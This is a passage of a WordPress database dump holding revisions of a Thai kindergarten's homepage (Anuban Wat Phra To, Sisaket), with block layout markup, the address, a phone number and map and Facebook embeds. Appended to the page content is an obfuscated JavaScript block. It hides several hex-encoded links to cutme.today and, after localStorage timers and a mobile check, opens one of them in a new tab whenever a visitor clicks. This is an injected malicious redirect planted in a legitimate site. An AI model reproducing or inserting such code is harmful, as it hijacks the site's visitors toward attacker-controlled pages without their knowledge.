{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:15:35','2025-07-15 09:15:35','',19,'http://watprato.ssk.in.th/?p=711',0,'revision','',0),
(712,1,'2025-07-15 16:18:39','2025-07-15 09:18:39','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 